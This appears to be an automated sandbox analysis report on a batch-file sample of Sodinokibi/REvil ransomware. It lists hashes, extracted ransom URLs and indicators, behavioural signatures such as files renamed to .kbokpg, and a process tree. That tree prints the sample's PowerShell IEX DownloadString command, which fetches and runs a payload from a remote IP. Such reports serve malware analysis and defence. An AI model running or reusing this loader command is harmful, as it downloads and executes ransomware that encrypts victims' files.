Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10_x64 -
resource
win10 -
submitted
03-10-2020 01:10
Static task
static1
Behavioral task
behavioral1
Sample
5436705d1e25ce0a762a32c200158950.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
5436705d1e25ce0a762a32c200158950.bat
Resource
win10
General
-
Target
5436705d1e25ce0a762a32c200158950.bat
-
Size
218B
-
MD5
a9f336d51108c56fda11701557ded1ec
-
SHA1
57aa584c781307cf32c1ff13800d0e2acdc3eb3e
-
SHA256
b5877c4cc1d72694fa3faafa1879979975365e52e7232eb6a3a9fe8aef4aea3c
-
SHA512
4c54738d6e6c73cba4f1376276314ee6a8ad69a33ca1eb5b011f2a46d78def7e44b01d9349495f366433ea8582fb0bdae124f554be08fa6fc314437703893274
Malware Config
Extracted
http://185.103.242.78/pastes/5436705d1e25ce0a762a32c200158950
Extracted
C:\kbokpg-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CB7C9BD72FBA8814
http://decryptor.cc/CB7C9BD72FBA8814
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 134 IoCs
Processes:
powershell.exeflow pid process 8 3420 powershell.exe 11 3420 powershell.exe 13 3420 powershell.exe 15 3420 powershell.exe 17 3420 powershell.exe 19 3420 powershell.exe 21 3420 powershell.exe 25 3420 powershell.exe 27 3420 powershell.exe 29 3420 powershell.exe 31 3420 powershell.exe 33 3420 powershell.exe 35 3420 powershell.exe 37 3420 powershell.exe 39 3420 powershell.exe 41 3420 powershell.exe 43 3420 powershell.exe 45 3420 powershell.exe 47 3420 powershell.exe 49 3420 powershell.exe 51 3420 powershell.exe 53 3420 powershell.exe 55 3420 powershell.exe 57 3420 powershell.exe 59 3420 powershell.exe 61 3420 powershell.exe 63 3420 powershell.exe 65 3420 powershell.exe 69 3420 powershell.exe 71 3420 powershell.exe 73 3420 powershell.exe 75 3420 powershell.exe 77 3420 powershell.exe 79 3420 powershell.exe 81 3420 powershell.exe 83 3420 powershell.exe 85 3420 powershell.exe 87 3420 powershell.exe 90 3420 powershell.exe 92 3420 powershell.exe 94 3420 powershell.exe 96 3420 powershell.exe 98 3420 powershell.exe 101 3420 powershell.exe 103 3420 powershell.exe 105 3420 powershell.exe 107 3420 powershell.exe 109 3420 powershell.exe 111 3420 powershell.exe 114 3420 powershell.exe 116 3420 powershell.exe 118 3420 powershell.exe 120 3420 powershell.exe 122 3420 powershell.exe 124 3420 powershell.exe 126 3420 powershell.exe 128 3420 powershell.exe 130 3420 powershell.exe 132 3420 powershell.exe 134 3420 powershell.exe 136 3420 powershell.exe 138 3420 powershell.exe 140 3420 powershell.exe 142 3420 powershell.exe -
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\WaitRevoke.png => \??\c:\users\admin\pictures\WaitRevoke.png.kbokpg powershell.exe File renamed C:\Users\Admin\Pictures\ClearExit.raw => \??\c:\users\admin\pictures\ClearExit.raw.kbokpg powershell.exe File renamed C:\Users\Admin\Pictures\ConvertMove.png => \??\c:\users\admin\pictures\ConvertMove.png.kbokpg powershell.exe File renamed C:\Users\Admin\Pictures\DisconnectFormat.png => \??\c:\users\admin\pictures\DisconnectFormat.png.kbokpg powershell.exe File renamed C:\Users\Admin\Pictures\ReceiveEnter.png => \??\c:\users\admin\pictures\ReceiveEnter.png.kbokpg powershell.exe File renamed C:\Users\Admin\Pictures\SaveSend.raw => \??\c:\users\admin\pictures\SaveSend.raw.kbokpg powershell.exe File renamed C:\Users\Admin\Pictures\StepEnter.raw => \??\c:\users\admin\pictures\StepEnter.raw.kbokpg powershell.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
powershell.exedescription ioc process File opened (read-only) \??\T: powershell.exe File opened (read-only) \??\W: powershell.exe File opened (read-only) \??\X: powershell.exe File opened (read-only) \??\Z: powershell.exe File opened (read-only) \??\G: powershell.exe File opened (read-only) \??\P: powershell.exe File opened (read-only) \??\R: powershell.exe File opened (read-only) \??\V: powershell.exe File opened (read-only) \??\Y: powershell.exe File opened (read-only) \??\D: powershell.exe File opened (read-only) \??\N: powershell.exe File opened (read-only) \??\O: powershell.exe File opened (read-only) \??\H: powershell.exe File opened (read-only) \??\J: powershell.exe File opened (read-only) \??\L: powershell.exe File opened (read-only) \??\S: powershell.exe File opened (read-only) \??\A: powershell.exe File opened (read-only) \??\F: powershell.exe File opened (read-only) \??\I: powershell.exe File opened (read-only) \??\K: powershell.exe File opened (read-only) \??\M: powershell.exe File opened (read-only) \??\Q: powershell.exe File opened (read-only) \??\U: powershell.exe File opened (read-only) \??\B: powershell.exe File opened (read-only) \??\E: powershell.exe -
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\97911gg8k04.bmp" powershell.exe -
Drops file in Program Files directory 12 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\kbokpg-readme.txt powershell.exe File created \??\c:\program files (x86)\kbokpg-readme.txt powershell.exe File opened for modification \??\c:\program files\ExitDebug.xps powershell.exe File opened for modification \??\c:\program files\FindUnblock.tif powershell.exe File opened for modification \??\c:\program files\LimitOptimize.wps powershell.exe File opened for modification \??\c:\program files\OutTest.MTS powershell.exe File opened for modification \??\c:\program files\StartAdd.vdw powershell.exe File opened for modification \??\c:\program files\UninstallSplit.raw powershell.exe File opened for modification \??\c:\program files\UpdateRepair.inf powershell.exe File opened for modification \??\c:\program files\ConvertSend.M2V powershell.exe File opened for modification \??\c:\program files\ResizeReceive.wav powershell.exe File opened for modification \??\c:\program files\UnregisterGrant.rm powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 3420 powershell.exe 3420 powershell.exe 3420 powershell.exe 3420 powershell.exe 3420 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 3420 powershell.exe Token: SeDebugPrivilege 3420 powershell.exe Token: SeTakeOwnershipPrivilege 3420 powershell.exe Token: SeBackupPrivilege 2884 vssvc.exe Token: SeRestorePrivilege 2884 vssvc.exe Token: SeAuditPrivilege 2884 vssvc.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 1588 wrote to memory of 3420 1588 cmd.exe powershell.exe PID 1588 wrote to memory of 3420 1588 cmd.exe powershell.exe PID 1588 wrote to memory of 3420 1588 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5436705d1e25ce0a762a32c200158950.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/5436705d1e25ce0a762a32c200158950');Invoke-UPTPJHLHIIY;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3420
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:2884
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/3420-0-0x0000000000000000-mapping.dmp
-
memory/3420-1-0x00000000736F0000-0x0000000073DDE000-memory.dmpFilesize
6.9MB
-
memory/3420-2-0x00000000068B0000-0x00000000068B1000-memory.dmpFilesize
4KB
-
memory/3420-3-0x0000000007060000-0x0000000007061000-memory.dmpFilesize
4KB
-
memory/3420-4-0x0000000006EA0000-0x0000000006EA1000-memory.dmpFilesize
4KB
-
memory/3420-5-0x0000000007690000-0x0000000007691000-memory.dmpFilesize
4KB
-
memory/3420-6-0x0000000007700000-0x0000000007701000-memory.dmpFilesize
4KB
-
memory/3420-7-0x0000000007A20000-0x0000000007A21000-memory.dmpFilesize
4KB
-
memory/3420-8-0x00000000077D0000-0x00000000077D1000-memory.dmpFilesize
4KB
-
memory/3420-9-0x00000000081D0000-0x00000000081D1000-memory.dmpFilesize
4KB
-
memory/3420-10-0x0000000008040000-0x0000000008041000-memory.dmpFilesize
4KB
-
memory/3420-11-0x00000000097C0000-0x00000000097C1000-memory.dmpFilesize
4KB
-
memory/3420-12-0x0000000008D30000-0x0000000008D31000-memory.dmpFilesize
4KB